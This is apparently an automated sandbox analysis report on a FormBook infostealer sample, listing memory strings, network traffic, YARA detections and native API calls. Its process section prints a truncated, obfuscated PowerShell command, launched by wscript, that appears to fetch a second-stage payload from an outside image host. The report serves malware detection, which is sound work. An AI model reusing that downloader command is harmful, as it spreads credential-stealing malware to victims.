Source: SyncHost.exe, 0000000D.00000002.2684799089.0000000004FF4000.00000004.10000000.00040000.00000000.sdmp, SYYSBomrTxWSggG.exe, 00000011.00000002.3368885114.0000000003604000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.3366935102.0000000009064000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/domain_pricing?source=expired
Source: SyncHost.exe, 0000000D.00000002.2684799089.0000000004FF4000.00000004.10000000.00040000.00000000.sdmp, SYYSBomrTxWSggG.exe, 00000011.00000002.3368885114.0000000003604000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.3366935102.0000000009064000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/domains/results
Source: SyncHost.exe, 0000000D.00000002.2684799089.0000000004FF4000.00000004.10000000.00040000.00000000.sdmp, SYYSBomrTxWSggG.exe, 00000011.00000002.3368885114.0000000003604000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.3366935102.0000000009064000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/email?source=expired
Source: SyncHost.exe, 0000000D.00000002.2684799089.0000000004FF4000.00000004.10000000.00040000.00000000.sdmp, SYYSBomrTxWSggG.exe, 00000011.00000002.3368885114.0000000003604000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.3366935102.0000000009064000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/privacy?source=expired
Source: SyncHost.exe, 0000000D.00000002.2684799089.0000000004FF4000.00000004.10000000.00040000.00000000.sdmp, SYYSBomrTxWSggG.exe, 00000011.00000002.3368885114.0000000003604000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.3366935102.0000000009064000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/renew/domain/rhyme.academy?source=expired
Source: SyncHost.exe, 0000000D.00000002.2684799089.0000000004FF4000.00000004.10000000.00040000.00000000.sdmp, SYYSBomrTxWSggG.exe, 00000011.00000002.3368885114.0000000003604000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.3366935102.0000000009064000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/renew?source=expired
Source: SyncHost.exe, 0000000D.00000002.2684799089.0000000004FF4000.00000004.10000000.00040000.00000000.sdmp, SYYSBomrTxWSggG.exe, 00000011.00000002.3368885114.0000000003604000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.3366935102.0000000009064000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/tools?source=expired
Source: SyncHost.exe, 0000000D.00000002.2684799089.0000000004FF4000.00000004.10000000.00040000.00000000.sdmp, SYYSBomrTxWSggG.exe, 00000011.00000002.3368885114.0000000003604000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.3366935102.0000000009064000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/tos?source=expired
Source: SyncHost.exe, 0000000D.00000002.2684799089.0000000004FF4000.00000004.10000000.00040000.00000000.sdmp, SYYSBomrTxWSggG.exe, 00000011.00000002.3368885114.0000000003604000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.3366935102.0000000009064000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/transfer_in?source=expired
Source: SyncHost.exe, 0000000D.00000002.2684799089.0000000004FF4000.00000004.10000000.00040000.00000000.sdmp, SYYSBomrTxWSggG.exe, 00000011.00000002.3368885114.0000000003604000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.3366935102.0000000009064000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.instagram.com/hover_domains

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown	HTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.6:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.215.45:443 -> 192.168.2.6:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.61.152.60:443 -> 192.168.2.6:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49698 version: TLS 1.2

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2683472741.0000000004270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3371183272.0000000003150000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2452322622.0000000000EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3370938043.0000000005650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2443671664.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2468777900.0000000001E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2683501602.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 10.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.2683472741.0000000004270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.3371183272.0000000003150000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.2452322622.0000000000EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.3370938043.0000000005650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.2443671664.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.2468777900.0000000001E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.2683501602.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: powershell.exe PID: 2616, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5804, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 8874
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 8874			Jump to behavior

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreNgDgTrevDgTreDkDgTreNwDgTre4DgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDIDgTreNQDgTre4DgTreDgDgTreNDgTreDgTre2DgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c dir /b .png .jpg .bmp .gif>"C:\Users\user\AppData\Local\DesktopPic\PicList.txt"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreNgDgTrevDgTreDkDgTreNwDgTre4DgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDIDgTreNQDgTre4DgTreDgDgTreNDgTreDgTre2DgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c dir /b .png .jpg .bmp .gif>"C:\Users\user\AppData\Local\DesktopPic\PicList.txt"	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0042AF33 NtClose,	10_2_0042AF33
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010335C0 NtCreateMutant,LdrInitializeThunk,	10_2_010335C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01032B60 NtClose,LdrInitializeThunk,	10_2_01032B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01032DF0 NtQuerySystemInformation,LdrInitializeThunk,	10_2_01032DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01032C70 NtFreeVirtualMemory,LdrInitializeThunk,	10_2_01032C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01033010 NtOpenDirectoryObject,	10_2_01033010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01033090 NtSetValueKey,	10_2_01033090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01034340 NtSetContextThread,	10_2_01034340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01034650 NtSuspendThread,	10_2_01034650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010339B0 NtGetContextThread,	10_2_010339B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01032B80 NtQueryInformationFile,	10_2_01032B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01032BA0 NtEnumerateValueKey,	10_2_01032BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01032BE0 NtQueryValueKey,	10_2_01032BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01032BF0 NtAllocateVirtualMemory,	10_2_01032BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01032AB0 NtWaitForSingleObject,	10_2_01032AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01032AD0 NtReadFile,	10_2_01032AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01032AF0 NtWriteFile,	10_2_01032AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01032D00 NtSetInformationFile,	10_2_01032D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01032D10 NtMapViewOfSection,	10_2_01032D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01033D10 NtOpenProcessToken,	10_2_01033D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01032D30 NtUnmapViewOfSection,	10_2_01032D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01033D70 NtOpenThread,	10_2_01033D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01032DB0 NtEnumerateKey,	10_2_01032DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01032DD0 NtDelayExecution,	10_2_01032DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01032C00 NtQueryInformationProcess,	10_2_01032C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01032C60 NtCreateKey,	10_2_01032C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01032CA0 NtQueryInformationToken,	10_2_01032CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01032CC0 NtQueryVirtualMemory,	10_2_01032CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01032CF0 NtOpenProcess,	10_2_01032CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01032F30 NtCreateSection,	10_2_01032F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01032F60 NtCreateProcessEx,	10_2_01032F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01032F90 NtProtectVirtualMemory,	10_2_01032F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01032FA0 NtQuerySection,	10_2_01032FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01032FB0 NtResumeThread,	10_2_01032FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01032FE0 NtCreateFile,	10_2_01032FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01032E30 NtWriteVirtualMemory,	10_2_01032E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01032E80 NtReadVirtualMemory,	10_2_01032E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01032EA0 NtAdjustPrivilegesToken,	10_2_01032EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01032EE0 NtQueueApcThread,	10_2_01032EE0
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_046535C0 NtCreateMutant,LdrInitializeThunk,	13_2_046535C0
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04654650 NtSuspendThread,LdrInitializeThunk,	13_2_04654650
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04654340 NtSetContextThread,LdrInitializeThunk,	13_2_04654340
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04652C60 NtCreateKey,LdrInitializeThunk,	13_2_04652C60
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04652C70 NtFreeVirtualMemory,LdrInitializeThunk,	13_2_04652C70
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04652CA0 NtQueryInformationToken,LdrInitializeThunk,	13_2_04652CA0
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04652D30 NtUnmapViewOfSection,LdrInitializeThunk,	13_2_04652D30
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04652D10 NtMapViewOfSection,LdrInitializeThunk,	13_2_04652D10
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04652DF0 NtQuerySystemInformation,LdrInitializeThunk,	13_2_04652DF0
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04652DD0 NtDelayExecution,LdrInitializeThunk,	13_2_04652DD0
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04652EE0 NtQueueApcThread,LdrInitializeThunk,	13_2_04652EE0
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04652E80 NtReadVirtualMemory,LdrInitializeThunk,	13_2_04652E80
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04652F30 NtCreateSection,LdrInitializeThunk,	13_2_04652F30
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04652FE0 NtCreateFile,LdrInitializeThunk,	13_2_04652FE0
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04652FB0 NtResumeThread,LdrInitializeThunk,	13_2_04652FB0
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_046539B0 NtGetContextThread,LdrInitializeThunk,	13_2_046539B0
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04652AF0 NtWriteFile,LdrInitializeThunk,	13_2_04652AF0
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04652AD0 NtReadFile,LdrInitializeThunk,	13_2_04652AD0
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04652B60 NtClose,LdrInitializeThunk,	13_2_04652B60
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04652BE0 NtQueryValueKey,LdrInitializeThunk,	13_2_04652BE0
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04652BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	13_2_04652BF0
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04652BA0 NtEnumerateValueKey,LdrInitializeThunk,	13_2_04652BA0
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04653010 NtOpenDirectoryObject,	13_2_04653010
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04653090 NtSetValueKey,	13_2_04653090
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04652C00 NtQueryInformationProcess,	13_2_04652C00
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04652CF0 NtOpenProcess,	13_2_04652CF0
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04652CC0 NtQueryVirtualMemory,	13_2_04652CC0
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04653D70 NtOpenThread,	13_2_04653D70
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04652D00 NtSetInformationFile,	13_2_04652D00
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04653D10 NtOpenProcessToken,	13_2_04653D10
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04652DB0 NtEnumerateKey,	13_2_04652DB0
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04652E30 NtWriteVirtualMemory,	13_2_04652E30
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04652EA0 NtAdjustPrivilegesToken,	13_2_04652EA0
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04652F60 NtCreateProcessEx,	13_2_04652F60
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04652FA0 NtQuerySection,	13_2_04652FA0
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_04652F90 NtProtectVirtualMemory,	13_2_04652F90
